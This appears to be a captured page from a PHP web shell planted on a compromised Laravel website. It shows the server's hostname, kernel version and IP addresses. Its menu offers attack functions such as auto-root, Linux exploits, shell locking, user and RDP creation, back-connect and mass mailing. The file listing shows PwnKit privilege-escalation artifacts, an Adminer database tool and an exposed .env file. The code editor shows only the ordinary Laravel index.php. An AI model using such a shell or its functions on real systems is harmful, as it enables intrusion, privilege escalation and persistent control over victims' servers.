Linux server.bornosky.com 4.18.0-477.13.1.lve.el8.x86_64 #1 SMP Thu Jun 1 16:40:47 EDT 2023 x86_64
Apache
: 95.217.200.235 | : 18.118.126.51
Cant Read [ /etc/named.conf ]
7.3.33
aggscedu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
aggscedu /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
corbuzier
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
video
[ DIR ]
drwxr-xr-x
well-known
[ DIR ]
d---------
.editorconfig
220
B
-rw-r--r--
.env
868
B
-rw-r--r--
.env.example
778
B
-rw-r--r--
.gitattributes
111
B
-rw-r--r--
.gitignore
163
B
-rw-r--r--
.htaccess
249
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.styleci.yml
174
B
-rw-r--r--
--index.php
1.78
KB
-rw-r--r--
JZ488.php7
0
B
-r--r--r--
README.md
4.44
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
artisan
1.65
KB
-rw-r--r--
composer.json
1.49
KB
-rw-r--r--
composer.lock
217.73
KB
-rw-r--r--
error_log
257
B
-rw-r--r--
googlef939858313ca3929.html
53
B
-rw-r--r--
index.php
1.78
KB
-rw-r--r--
package.json
1004
B
-rw-r--r--
phpunit.xml
1.11
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
robots.txt
24
B
-rw-r--r--
vendor.tar
38.48
MB
-rw-r--r--
web.config
1.17
KB
-rw-r--r--
webpack.mix.js
538
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php /** * Laravel - A PHP Framework For Web Artisans * * @package Laravel * @author Taylor Otwell <taylor@laravel.com> */ define('LARAVEL_START', microtime(true)); /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader for | our application. We just need to utilize it! We'll simply require it | into the script here so that we don't have to worry about manual | loading any of our classes later on. It feels great to relax. | */ require __DIR__ . '/./vendor/autoload.php'; /* |-------------------------------------------------------------------------- | Turn On The Lights |-------------------------------------------------------------------------- | | We need to illuminate PHP development, so let us turn on the lights. | This bootstraps the framework and gets it ready for use, then it | will load up this application so that we can run it and send | the responses back to the browser and delight our users. | */ $app = require_once __DIR__ . '/./bootstrap/app.php'; /* |-------------------------------------------------------------------------- | Run The Application |-------------------------------------------------------------------------- | | Once we have the application, we can handle the incoming request | through the kernel, and send the associated response back to | the client's browser allowing them to enjoy the creative | and wonderful application we have prepared for them. | */ $kernel = $app->make(Illuminate\Contracts\Http\Kernel::class); $response = $kernel->handle( $request = Illuminate\Http\Request::capture() ); $response->send(); $kernel->terminate($request, $response);
Close